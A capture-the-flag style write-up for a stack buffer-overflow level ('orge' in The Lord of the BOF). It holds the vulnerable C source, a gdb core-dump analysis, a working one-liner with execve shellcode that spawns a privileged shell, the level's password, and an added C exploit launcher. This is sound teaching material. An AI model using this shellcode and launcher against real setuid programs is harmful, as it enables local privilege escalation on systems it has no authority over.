List the files, then look at the source of orge.c:
[darkelf@localhost darkelf]$ cat orge.c
/*
The Lord of the BOF : The Fellowship of the BOF
- orge
- check argv[0]
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// here is changed!
if(strlen(argv[0]) != 77){
printf("argv[0] error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
Compared with the previous level, the new condition is strlen(argv[0]) == 77. The rest is familiar: every environment string is zeroed (so no shellcode in environment variables), argv[1] may be at most 48 bytes and argv[1][47] must be 0xbf (the return address has to point into the stack), and buffer is zeroed right after the strcpy, so the shellcode cannot stay in buffer either. argv[2] is never touched, so that is where the NOP sled and shellcode go. To satisfy the argv[0] check the program is run as ./ followed by 75 'A's (2 + 75 = 77 characters), which needs a link or copy of orge under that name; the command that creates it is not shown here.

Create a tmp directory with mkdir and move into it. The core file examined below was produced there by running a copy of the program under that 75-'A' name, with 44 'D's plus 0xbfffffff as argv[1] and the NOP sled plus shellcode as argv[2] (the crashing run itself is not shown).
[darkelf@localhost tmp]$ gdb -c core -q
Core was generated by `./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA D'.
Program terminated with signal 11, Segmentation fault.
#0 0xbfffffff in ?? ()
(gdb) x/1000x $esp
0xbffff9d0: 0x00000000 0xbffffa14 0xbffffa24 0x40013868
0xbffff9e0: 0x00000003 0x08048450 0x00000000 0x08048471
...
---Type <return> to continue, or q <return> to quit---return
0xbffffb40: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb50: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb60: 0x41414141 0x41414141 0x41414141 0x44440041
0xbffffb70: 0x44444444 0x44444444 0x44444444 0x44444444
0xbffffb80: 0x44444444 0x44444444 0x44444444 0x44444444
0xbffffb90: 0x44444444 0x44444444 0xffff4444 0x9000bfff
0xbffffba0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbb0: 0x31909090 0x2f6850c0 0x6868732f 0x6e69622f
0xbffffbc0: 0x5350e389 0xc289e189 0x80cd0bb0 0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) q
Use gdb on the core file to find where the shellcode begins. Execution stopped at 0xbfffffff, the value placed at argv[1][44..47], so the return address is under control. In the dump, argv[0] (0x41 bytes) ends at 0xbffffb6c and argv[1] follows: 44 bytes of 0x44 and then ff ff ff bf. argv[2] starts right after argv[1]'s terminating NUL, at 0xbffffb9f: 20 NOP bytes (0x90) run through 0xbffffbb2, followed by the shellcode (0x31 0xc0 ...). 0xbffffbb0 lies inside the sled, so it is used as the return address. Running the real binary from the home directory after cd .. changes the environment slightly (PWD, for one) and shifts these strings by a few bytes; the NOP sled is what absorbs that shift.
[darkelf@localhost tmp]$ cd ..
[darkelf@localhost darkelf]$ ./`python -c 'print "A"*75+" "+"D"*44+"\xb0\xfb\xff\xbf"+" "+"\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD°ûÿ¿
bash$ id
uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darkelf)
bash$ my-pass
euid = 507
timewalker
Payload: argv[0] is ./ plus 75 'A's (77 characters), argv[1] is 44 'D's plus 0xbffffbb0 in little-endian order (48 bytes, byte 47 = 0xbf), and argv[2] is 20 NOPs plus the 25-byte execve("/bin//sh") shellcode. The printf shows buffer with the four address bytes rendered as °ûÿ¿; the overwritten return address then sends execution into the sled and a shell comes up with euid 507 (orge). my-pass prints the password.
pw : timewalker
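As an added example (not part of the writeup), the following C program builds the same three argument strings and starts the target with execve(), which lets argv[0] be set to the required 77 characters without creating a 75-'A' link, and lets the payload be checked against the binary's own conditions before it is launched. The target path ./orge and the empty environment are assumptions. The return address 0xbffffbb0 is the value read from the core dump above; argv strings move when the environment changes, so it is a parameter of build_argv1() and should be re-derived with a core dump for the environment you actually launch from.

```c
/* Added example, not the writeup's own code.
 * Builds argv[0..2] for orge and launches it via execve().
 * Assumptions: target path "./orge", empty environment. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define ARGV0_LEN   77          /* strlen(argv[0]) must be exactly 77 */
#define ARGV1_LEN   48          /* strlen(argv[1]) <= 48 and argv[1][47] == 0xbf */
#define RET_OFFSET  44          /* buffer[40] + saved ebp, then the return address */
#define NOP_COUNT   20          /* sled length used in the writeup */
#define RET_ADDR    0xbffffbb0u /* inside the argv[2] sled in the core dump above */

/* 25-byte execve("/bin//sh") shellcode, byte for byte as in the writeup */
static const unsigned char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* argv[0]: "./" followed by 75 'A' (77 characters). Returns the length, 0 on error. */
size_t build_argv0(char *out, size_t outsz)
{
    if (outsz < ARGV0_LEN + 1) return 0;
    memcpy(out, "./", 2);
    memset(out + 2, 'A', ARGV0_LEN - 2);
    out[ARGV0_LEN] = '\0';
    return ARGV0_LEN;
}

/* argv[1]: 44 filler bytes, then ret in little-endian order. Byte 47 is the
 * high byte 0xbf, which is exactly what the binary tests for. */
size_t build_argv1(char *out, size_t outsz, unsigned int ret)
{
    if (outsz < ARGV1_LEN + 1) return 0;
    memset(out, 'D', RET_OFFSET);
    for (int i = 0; i < 4; i++)
        out[RET_OFFSET + i] = (char)((ret >> (8 * i)) & 0xff);
    out[ARGV1_LEN] = '\0';
    return ARGV1_LEN;
}

/* argv[2]: NOP sled followed by the shellcode. orge only wipes environ and
 * buffer, so this string is still intact when the overwritten return fires. */
size_t build_argv2(char *out, size_t outsz)
{
    size_t len = NOP_COUNT + SHELLCODE_LEN;
    if (outsz < len + 1) return 0;
    memset(out, 0x90, NOP_COUNT);
    memcpy(out + NOP_COUNT, shellcode, SHELLCODE_LEN);
    out[len] = '\0';
    return len;
}

/* Mirrors the checks in orge.c. The binary accepts any length <= 48 with
 * byte 47 == 0xbf, but only a full 48-byte string reaches the return
 * address at offset 44, so this insists on exactly 48. */
int passes_checks(const char *a0, const char *a1)
{
    if (strlen(a0) != ARGV0_LEN) return 0;
    if (strlen(a1) != ARGV1_LEN) return 0;
    if ((unsigned char)a1[47] != 0xbf) return 0;
    return 1;
}

int main(int argc, char **argv)
{
    const char *target = argc > 1 ? argv[1] : "./orge";   /* assumed path */
    char a0[ARGV0_LEN + 1], a1[ARGV1_LEN + 1], a2[NOP_COUNT + SHELLCODE_LEN + 1];

    if (!build_argv0(a0, sizeof a0) || !build_argv1(a1, sizeof a1, RET_ADDR) ||
        !build_argv2(a2, sizeof a2) || !passes_checks(a0, a1)) {
        fprintf(stderr, "payload construction failed\n");
        return 1;
    }
    char *args[] = { a0, a1, a2, NULL };
    char *envp[] = { NULL };   /* empty environment; orge zeroes it anyway */
    execve(target, args, envp);
    perror("execve");          /* only reached if execve fails */
    return 1;
}
```

passes_checks() returning 0 means orge would exit on one of its own tests before the strcpy, so nothing is gained by launching. Because execve() supplies argv[0] directly, no file named with 75 'A's has to exist; the only thing that still has to be re-measured per environment is the return address.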